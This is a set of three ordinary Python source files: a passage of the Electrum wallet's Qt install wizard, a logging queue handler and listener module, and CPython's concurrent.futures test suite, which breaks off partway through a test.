msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = '\n'.join(self.storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
return
if self.storage.requires_upgrade():
self.storage.upgrade()
self.wallet = Wallet(self.storage)
return self.wallet
action = self.storage.get_action()
if action and action != 'new':
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
if action:
# self.wallet is set in run
self.run(action)
return self.wallet
self.wallet = Wallet(self.storage)
return self.wallet
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(filename).scaledToWidth(60))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, title=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False):
return self.text_input(title, message, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
playout = PasswordLayout(None, msg, kind, self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(None, MSG_HW_STORAGE_ENCRYPTION, PW_NEW, self.next_button)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
def show_restore(self, wallet, network):
# FIXME: these messages are shown after the install wizard is
# finished and the window closed. On MacOSX they appear parented
# with a re-appeared ghost install wizard window...
if network:
def task():
wallet.wait_until_synchronized()
if wallet.is_found():
msg = _("Recovery successful")
else:
msg = _("No transactions found for this seed")
self.synchronized_signal.emit(msg)
self.synchronized_signal.connect(self.show_message)
t = threading.Thread(target = task)
t.daemon = True
t.start()
else:
msg = _("This wallet was restored offline. It may "
"contain more addresses than displayed.")
self.show_message(msg)
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self):
self.accept_signal.emit()
def waiting_dialog(self, task, msg):
self.please_wait.setText(msg)
self.refresh_gui()
t = threading.Thread(target = task)
t.start()
t.join()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=()):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMaximumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return ' '.join(line.text().split())
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
queue.py
|
#
# Copyright (C) 2010-2017 Vinay Sajip. See LICENSE.txt for details.
#
"""
This module contains classes which help you work with queues. A typical
application is when you want to log from performance-critical threads, but
where the handlers you want to use are slow (for example,
:class:`~logging.handlers.SMTPHandler`). In that case, you can create a queue,
pass it to a :class:`QueueHandler` instance and use that instance with your
loggers. Elsewhere, you can instantiate a :class:`QueueListener` with the same
queue and some slow handlers, and call :meth:`~QueueListener.start` on it.
This will start monitoring the queue on a separate thread and call all the
configured handlers *on that thread*, so that your logging thread is not held
up by the slow handlers.
Note that as well as in-process queues, you can use these classes with queues
from the :mod:`multiprocessing` module.
**N.B.** This is part of the standard library since Python 3.2, so the
version here is for use with earlier Python versions.
"""
import logging
try:
import Queue as queue
except ImportError:
import queue
import threading
class QueueHandler(logging.Handler):
"""
This handler sends events to a queue. Typically, it would be used together
with a multiprocessing Queue to centralise logging to file in one process
(in a multi-process application), so as to avoid file write contention
between processes.
:param queue: The queue to send `LogRecords` to.
"""
def __init__(self, queue):
"""
Initialise an instance, using the passed queue.
"""
logging.Handler.__init__(self)
self.queue = queue
def enqueue(self, record):
"""
Enqueue a record.
The base implementation uses :meth:`~queue.Queue.put_nowait`. You may
want to override this method if you want to use blocking, timeouts or
custom queue implementations.
:param record: The record to enqueue.
"""
self.queue.put_nowait(record)
def prepare(self, record):
"""
Prepares a record for queuing. The object returned by this method is
enqueued.
The base implementation formats the record to merge the message
and arguments, and removes unpickleable items from the record
in-place.
You might want to override this method if you want to convert
the record to a dict or JSON string, or send a modified copy
of the record while leaving the original intact.
:param record: The record to prepare.
"""
# The format operation gets traceback text into record.exc_text
# (if there's exception data), and also puts the message into
# record.message. We can then use this to replace the original
# msg + args, as these might be unpickleable. We also zap the
# exc_info attribute, as it's no longer needed and, if not None,
# will typically not be pickleable.
self.format(record)
record.msg = record.message
record.args = None
record.exc_info = None
return record
def emit(self, record):
"""
Emit a record.
Writes the LogRecord to the queue, preparing it for pickling first.
:param record: The record to emit.
"""
try:
self.enqueue(self.prepare(record))
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
class QueueListener(object):
"""
This class implements an internal threaded listener which watches for
LogRecords being added to a queue, removes them and passes them to a
list of handlers for processing.
:param record: The queue to listen to.
:param handlers: The handlers to invoke on everything received from
the queue.
"""
_sentinel = None
def __init__(self, queue, *handlers):
"""
Initialise an instance with the specified queue and
handlers.
"""
self.queue = queue
self.handlers = handlers
self._stop = threading.Event()
self._thread = None
def dequeue(self, block):
"""
Dequeue a record and return it, optionally blocking.
The base implementation uses :meth:`~queue.Queue.get`. You may want to
override this method if you want to use timeouts or work with custom
queue implementations.
:param block: Whether to block if the queue is empty. If `False` and
the queue is empty, an :class:`~queue.Empty` exception
will be thrown.
"""
return self.queue.get(block)
def start(self):
"""
Start the listener.
This starts up a background thread to monitor the queue for
LogRecords to process.
"""
self._thread = t = threading.Thread(target=self._monitor)
t.setDaemon(True)
t.start()
def prepare(self , record):
"""
Prepare a record for handling.
This method just returns the passed-in record. You may want to
override this method if you need to do any custom marshalling or
manipulation of the record before passing it to the handlers.
:param record: The record to prepare.
"""
return record
def handle(self, record):
"""
Handle a record.
This just loops through the handlers offering them the record
to handle.
:param record: The record to handle.
"""
record = self.prepare(record)
for handler in self.handlers:
handler.handle(record)
def _monitor(self):
"""
Monitor the queue for records, and ask the handler
to deal with them.
This method runs on a separate, internal thread.
The thread will terminate if it sees a sentinel object in the queue.
"""
q = self.queue
has_task_done = hasattr(q, 'task_done')
while not self._stop.isSet():
try:
record = self.dequeue(True)
if record is self._sentinel:
break
self.handle(record)
if has_task_done:
q.task_done()
except queue.Empty:
pass
# There might still be records in the queue.
while True:
try:
record = self.dequeue(False)
if record is self._sentinel:
break
self.handle(record)
if has_task_done:
q.task_done()
except queue.Empty:
break
def enqueue_sentinel(self):
"""
Writes a sentinel to the queue to tell the listener to quit. This
implementation uses ``put_nowait()``. You may want to override this
method if you want to use timeouts or work with custom queue
implementations.
"""
self.queue.put_nowait(self._sentinel)
def stop(self):
"""
Stop the listener.
This asks the thread to terminate, and then waits for it to do so.
Note that if you don't call this before your application exits, there
may be some records still left on the queue, which won't be processed.
"""
self._stop.set()
self.enqueue_sentinel()
self._thread.join()
self._thread = None
|
test_concurrent_futures.py
|
import test.support
# Skip tests if _multiprocessing wasn't built.
test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
# import threading after _multiprocessing to raise a more relevant error
# message: "No module named _multiprocessing". _multiprocessing is not compiled
# without thread support.
test.support.import_module('threading')
from test.support.script_helper import assert_python_ok
import itertools
import os
import sys
import threading
import time
import unittest
import weakref
from concurrent import futures
from concurrent.futures._base import (
PENDING, RUNNING, CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED, Future)
from concurrent.futures.process import BrokenProcessPool
def create_future(state=PENDING, exception=None, result=None):
f = Future()
f._state = state
f._exception = exception
f._result = result
return f
PENDING_FUTURE = create_future(state=PENDING)
RUNNING_FUTURE = create_future(state=RUNNING)
CANCELLED_FUTURE = create_future(state=CANCELLED)
CANCELLED_AND_NOTIFIED_FUTURE = create_future(state=CANCELLED_AND_NOTIFIED)
EXCEPTION_FUTURE = create_future(state=FINISHED, exception=OSError())
SUCCESSFUL_FUTURE = create_future(state=FINISHED, result=42)
def mul(x, y):
return x * y
def sleep_and_raise(t):
time.sleep(t)
raise Exception('this is an exception')
def sleep_and_print(t, msg):
time.sleep(t)
print(msg)
sys.stdout.flush()
class MyObject(object):
def my_method(self):
pass
def make_dummy_object(_):
return MyObject()
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._thread_key = test.support.threading_setup()
def tearDown(self):
test.support.reap_children()
test.support.threading_cleanup(*self._thread_key)
class ExecutorMixin:
worker_count = 5
def setUp(self):
super().setUp()
self.t1 = time.time()
try:
self.executor = self.executor_type(max_workers=self.worker_count)
except NotImplementedError as e:
self.skipTest(str(e))
self._prime_executor()
def tearDown(self):
self.executor.shutdown(wait=True)
self.executor = None
dt = time.time() - self.t1
if test.support.verbose:
print("%.2fs" % dt, end=' ')
self.assertLess(dt, 60, "synchronization issue: test lasted too long")
super().tearDown()
def _prime_executor(self):
# Make sure that the executor is ready to do work before running the
# tests. This should reduce the probability of timeouts in the tests.
futures = [self.executor.submit(time.sleep, 0.1)
for _ in range(self.worker_count)]
for f in futures:
f.result()
class ThreadPoolMixin(ExecutorMixin):
executor_type = futures.ThreadPoolExecutor
class ProcessPoolMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
class ExecutorShutdownTest:
def test_run_after_shutdown(self):
self.executor.shutdown()
self.assertRaises(RuntimeError,
self.executor.submit,
pow, 2, 5)
def test_interpreter_shutdown(self):
# Test the atexit hook for shutdown of worker threads and processes
rc, out, err = assert_python_ok('-c', """if 1:
from concurrent.futures import {executor_type}
from time import sleep
from test.test_concurrent_futures import sleep_and_print
t = {executor_type}(5)
t.submit(sleep_and_print, 1.0, "apple")
""".format(executor_type=self.executor_type.__name__))
# Errors in atexit hooks don't change the process exit code, check
# stderr manually.
self.assertFalse(err)
self.assertEqual(out.strip(), b"apple")
def test_hang_issue12364(self):
fs = [self.executor.submit(time.sleep, 0.1) for _ in range(50)]
self.executor.shutdown()
for f in fs:
f.result()
class ThreadPoolShutdownTest(ThreadPoolMixin, ExecutorShutdownTest, BaseTestCase):
def _prime_executor(self):
pass
def test_threads_terminate(self):
self.executor.submit(mul, 21, 2)
self.executor.submit(mul, 6, 7)
self.executor.submit(mul, 3, 14)
self.assertEqual(len(self.executor._threads), 3)
self.executor.shutdown()
for t in self.executor._threads:
t.join()
def test_context_manager_shutdown(self):
with futures.ThreadPoolExecutor(max_workers=5) as e:
executor = e
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for t in executor._threads:
t.join()
def test_del_shutdown(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
t.join()
def test_thread_names_assigned(self):
executor = futures.ThreadPoolExecutor(
max_workers=5, thread_name_prefix='SpecialPool')
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
self.assertRegex(t.name, r'^SpecialPool_[0-4]$')
t.join()
def test_thread_names_default(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
# Ensure that our default name is reasonably sane and unique when
# no thread_name_prefix was supplied.
self.assertRegex(t.name, r'ThreadPoolExecutor-\d+_[0-4]$')
t.join()
class ProcessPoolShutdownTest(ProcessPoolMixin, ExecutorShutdownTest, BaseTestCase):
def _prime_executor(self):
pass
def test_processes_terminate(self):
self.executor.submit(mul, 21, 2)
self.executor.submit(mul, 6, 7)
self.executor.submit(mul, 3, 14)
self.assertEqual(len(self.executor._processes), 5)
processes = self.executor._processes
self.executor.shutdown()
for p in processes.values():
p.join()
def test_context_manager_shutdown(self):
with futures.ProcessPoolExecutor(max_workers=5) as e:
processes = e._processes
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for p in processes.values():
p.join()
def test_del_shutdown(self):
executor = futures.ProcessPoolExecutor(max_workers=5)
list(executor.map(abs, range(-5, 5)))
queue_management_thread = executor._queue_management_thread
processes = executor._processes
call_queue = executor._call_queue
del executor
queue_management_thread.join()
for p in processes.values():
p.join()
call_queue.close()
call_queue.join_thread()
class WaitTests:
def test_first_completed(self):
future1 = self.executor.submit(mul, 21, 2)
future2 = self.executor.submit(time.sleep, 1.5)
done, not_done = futures.wait(
[CANCELLED_FUTURE, future1, future2],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(set([future1]), done)
self.assertEqual(set([CANCELLED_FUTURE, future2]), not_done)
def test_first_completed_some_already_completed(self):
future1 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE, future1],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(
set([CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE]),
finished)
self.assertEqual(set([future1]), pending)
def test_first_exception(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(sleep_and_raise, 1.5)
future3 = self.executor.submit(time.sleep, 3)
finished, pending = futures.wait(
[future1, future2, future3],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([future1, future2]), finished)
self.assertEqual(set([future3]), pending)
def test_first_exception_some_already_complete(self):
future1 = self.executor.submit(divmod, 21, 0)
future2 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1, future2],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1]), finished)
self.assertEqual(set([CANCELLED_FUTURE, future2]), pending)
def test_first_exception_one_already_failed(self):
future1 = self.executor.submit(time.sleep, 2)
finished, pending = futures.wait(
[EXCEPTION_FUTURE, future1],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([EXCEPTION_FUTURE]), finished)
self.assertEqual(set([future1]), pending)
def test_all_completed(self):
future1 = self.executor.submit(divmod, 2, 0)
future2 = self.executor.submit(mul, 2, 21)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2],
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2]), finished)
self.assertEqual(set(), pending)
def test_timeout(self):
future1 = self.executor.submit(mul, 6, 7)
future2 = self.executor.submit(time.sleep, 6)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2],
timeout=5,
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1]), finished)
self.assertEqual(set([future2]), pending)
class ThreadPoolWaitTests(ThreadPoolMixin, WaitTests, BaseTestCase):
def test_pending_calls_race(self):
# Issue #14406: multi-threaded race condition when waiting on all
# futures.
event = threading.Event()
def future_func():
event.wait()
oldswitchinterval = sys.getswitchinterval()
sys.setswitchinterval(1e-6)
try:
fs = {self.executor.submit(future_func) for i in range(100)}
event.set()
futures.wait(fs, return_when=futures.ALL_COMPLETED)
finally:
sys.setswitchinterval(oldswitchinterval)
class ProcessPoolWaitTests(ProcessPoolMixin, WaitTests, BaseTestCase):
pass
class AsCompletedTests:
# TODO(brian@sweetapp.com): Should have a test with a non-zero timeout.
def test_no_timeout(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(mul, 7, 6)
completed = set(futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]))
self.assertEqual(set(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]),
completed)
def test_zero_timeout(self):
future1 = self.executor.submit(time.sleep, 2)
completed_futures = set()
try:
for future in futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1],
timeout=0):
completed_futures.add(future)
except futures.TimeoutError:
pass
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE]),
completed_futures)
def test_duplicate_futures(self):
# Issue 20367. Duplicate futures should not raise exceptions or give
# duplicate responses.
# Issue #31641: accept arbitrary iterables.
future1 = self.executor.submit(time.sleep, 2)
completed = [
f for f in futures.as_completed(itertools.repeat(future1, 3))
]
self.assertEqual(len(completed), 1)
def test_free_reference_yielded_future(self):
# Issue #14406: Generator should not keep references
# to finished futures.
futures_list = [Future() for _ in range(8)]
futures_list.append(create_future(state=CANCELLED_AND_NOTIFIED))
futures_list.append(create_future(state=FINISHED, result=42))
with self.assertRaises(futures.TimeoutError):
for future in futures.as_completed(futures_list, timeout=0):
futures_list.remove(future)
wr = weakref.ref(future)
del future
self.assertIsNone(wr())
futures_list[0].set_result("test")
for future in futures.as_completed(futures_list):
futures_list.remove(future)
wr = weakref.ref(future)
del future
self.assertIsNone(wr())
if futures_list:
futures_list[0].set_result("test")
def test_correct_timeout_exception_msg(self):
futures_list = [CANCELLED_AND_NOTIFIED_FUTURE, PENDING_FUTURE,
RUNNING_FUTURE, SUCCESSFUL_FUTURE]
with self.assertRaises(futures.TimeoutError) as cm:
list(futures.as_completed(futures_list, timeout=0))
self.assertEqual(str(cm.exception), '2 (of 4) futures unfinished')
class ThreadPoolAsCompletedTests(ThreadPoolMixin, AsCompletedTests, BaseTestCase):
pass
class ProcessPoolAsCompletedTests(ProcessPoolMixin, AsCompletedTests, BaseTestCase):
pass
class ExecutorTest:
# Executor.shutdown() and context manager usage is tested by
# ExecutorShutdownTest.
def test_submit(self):
future = self.executor.submit(pow, 2, 8)
self.assertEqual(256, future.result())
def test_submit_keyword(self):
future = self.executor.submit(mul, 2, y=8)
self.assertEqual(16, future.result())
def test_map(self):
self.assertEqual(
list(self.executor.map(pow, range(10), range(10))),
list(map(pow, range(10), range(10))))
self.assertEqual(
list(self.executor.map(pow, range(10), range(10), chunksize=3)),
list(map(pow, range(10), range(10))))
def test_map_exception(self):
i = self.executor.map(divmod, [1, 1, 1, 1], [2, 3, 0, 5])
self.assertEqual(i.__next__(), (0, 1))
self.assertEqual(i.__next__(), (0, 1))
self.assertRaises(ZeroDivisionError, i.__next__)
def test_map_timeout(self):
results = []
try:
for i in self.executor.map(time.sleep,
[0, 0, 6],
timeout=5):
results.append(i)
except futures.TimeoutError:
pass
else:
self.fail('expected TimeoutError')
self.assertEqual([None, None], results)
def test_shutdown_race_issue12456(self):
# Issue #12456: race condition at shutdown where trying to post a
# sentinel in the call queue blocks (the queue is full while processes
# have exited).
self.executor.map(str, [2] * (self.worker_count + 1))
self.executor.shutdown()
@test.support.cpython_only
def test_no_stale_references(self):
# Issue #16284: check that the executors don't unnecessarily hang onto
# references.
my_object = MyObject()
my_object_collected = threading.Event()
my_object_callback = weakref.ref(
my_object, lambda obj: my_object_collected.set())
# Deliberately discarding the future.
self.executor.submit(my_object.my_method)
del my_object
collected = my_object_collected.wait(timeout=5.0)
self.assertTrue(collected,
"Stale reference not collected within timeout.")
def test_max_workers_negative(self):
for number in (0, -1):
with self.assertRaisesRegex(ValueError,
"max_workers must be greater "
"than 0"):
self.executor_type(max_workers=number)
def test_free_reference(self):
# Issue #14406: Result iterator should not keep an internal
# reference to result objects.
for obj in self.executor.map(make_dummy_object, range(10)):
wr = weakref.ref(obj)
del obj
self.assertIsNone(wr())
class ThreadPoolExecutorTest(ThreadPoolMixin, ExecutorTest, BaseTestCase):
def test_map_submits_without_iteration(self):
"""Tests verifying issue 11777."""
finished = []
def record_finished(n):
finished.append(n)
self.executor.map(record_finished, range(10))
self.executor.shutdown(wait=True)
self.assertCountEqual(finished, range(10))
def test_default_workers(self):
executor = self.executor_type()
self.assertEqual(executor._max_workers,
(os.cpu_count() or 1) * 5)
class ProcessPoolExecutorTest(ProcessPoolMixin, ExecutorTest, BaseTestCase):
def test_killed_child(self):
# When a child process is abruptly terminated, the whole pool gets
# "broken".
futures = [self.executor.submit(time.sleep, 3)]
# Get one of the processes, and terminate (kill) it
p = next(iter(self.executor._processes.values()))
p.terminate()
for fut in futures:
self.assertRaises(BrokenProcessPool, fut.result)
# Submitting other jobs fails as well.
self.assertRaises(BrokenProcessPool, self.executor.submit, pow, 2, 8)
def test_map_chunksize(self):
def bad_map():
list(self.executor.map(pow, range(40), range(40), chunksize=-1))
ref = list(map(pow, range(40), range(40)))
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=6)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=50)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=40)),
ref)
self.assertRaises(ValueError, bad_map)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
future = self.executor.submit(self._test_traceback)
with self.assertRaises(Exception) as cm:
future.result()
exc = cm.exception
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), futures.process._RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
class FutureTests(BaseTestCase):
def test_done_callback_with_result(self):
callback_result = None
def fn(callback_future):
nonlocal callback_result
callback_result = callback_future.result()
f = Future()
f.add_done_callback(fn)
f.set_result(5)
self.assertEqual(5, callback_result)
def test_done_callback_with_exception(self):
callback_exception = None
def fn(callback_future):
nonlocal callback_exception
callback_exception = callback_future.exception()
f = Future()
f.add_done_callback(fn)
f.set_exception(Exception('test'))
self.assertEqual(('test',), callback_exception.args)
def test_done_callback_with_cancel(self):
was_cancelled = None
def fn(callback_future):
nonlocal was_cancelled
was_cancelled = callback_future.cancelled()
f = Future()
f.add_done_callback(fn)
self.assertTrue(f.cancel())
self.assertTrue(was_cancelled)
def test_done_callback_raises(self):
with test.support.captured_stderr() as stderr:
raising_was_called = False
fn_was_called = False
def raising_fn(callback_future):
nonlocal raising_was_called
raising_was_called = True
raise Exception('doh!')
def fn(callback_future):
nonlocal fn_was_called
fn_was_called = True
f = Future()
f.add_done_callback(raising_fn)
f.add_done_callback(fn)
f.set_result(5)
self.assertTrue(raising_was_called)
self.assertTrue(fn_was_called)
self.assertIn('Exception: doh!', stderr.getvalue())
def test_done_callback_already_successful(self):
callback_result = None
def fn(callback_future):
nonlocal callback_result
callback_result = callback_future.result()
f = Future()
f.set_result(5)
f.add_done_callback(fn)
self.assertEqual(5, callback_result)
def test_done_callback_already_failed(self):
callback_exception = None
def fn(callback_future):
nonlocal callback_exception
callback_exception = callback_future.exception()
f = Future()
f.set_exception(Exception('test'))
f.add_done_callback(fn)
self.assertEqual(('test',), callback_exception.args)
def test_done_callback_already_cancelled(self):
was_cancelled = None
def fn(callback_future):
nonlocal was_cancelled
was_cancelled = callback_future.cancelled()
f = Future()
self.assertTrue(f.cancel())
f.add_done_callback(fn)
self.assertTrue(was_cancelled)
def test_repr(self):
self.assertRegex(repr(PENDING_FUTURE),
'<Future at 0x[0-9a-f]+ state=pending>')
self.assertRegex(repr(RUNNING_FUTURE),
